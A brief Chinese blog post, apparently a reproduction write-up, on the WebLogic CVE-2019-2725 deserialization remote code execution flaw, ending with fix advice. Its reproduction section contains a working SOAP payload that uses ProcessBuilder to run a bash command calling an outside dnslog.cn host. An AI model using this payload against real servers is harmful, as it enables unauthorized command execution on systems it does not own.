发布于 

CVE-2019-2725(WebLogic远程代码执行)

1. 漏洞概述

全称:WebLogic反序列化远程代码执行漏洞

描述:此漏洞存在于异步通讯服务,可通过访问路径/_async/AsyncResponseService,判断不安全组件是否开启。wls9_async_response.war包中的类由于使用注解方法调用了Weblogic原生处理Web服务的类,因此会受该漏洞影响。

2. 利用条件

  • bea_wls9_async_response.war
  • wsat.war
  • 存在/_async/AsyncResponseService 接口

3. 影响版本

  • Oracle WebLogic Server 10.*
  • Oracle WebLogic Server 12.1.3

4. 漏洞复现

4.1 访问接口

访问/_async/AsyncResponseService接口,存在界面即存在漏洞

image-20221009232950178

4.2 attack-命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping tuwkl1.dnslog.cn</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>

image-20221009234304369

4.3 attack-success

image-20221009234507181

5. 漏洞分析

6. 修复建议

  • 关闭/_async/AsyncResponseService接口

  • 升级至最新版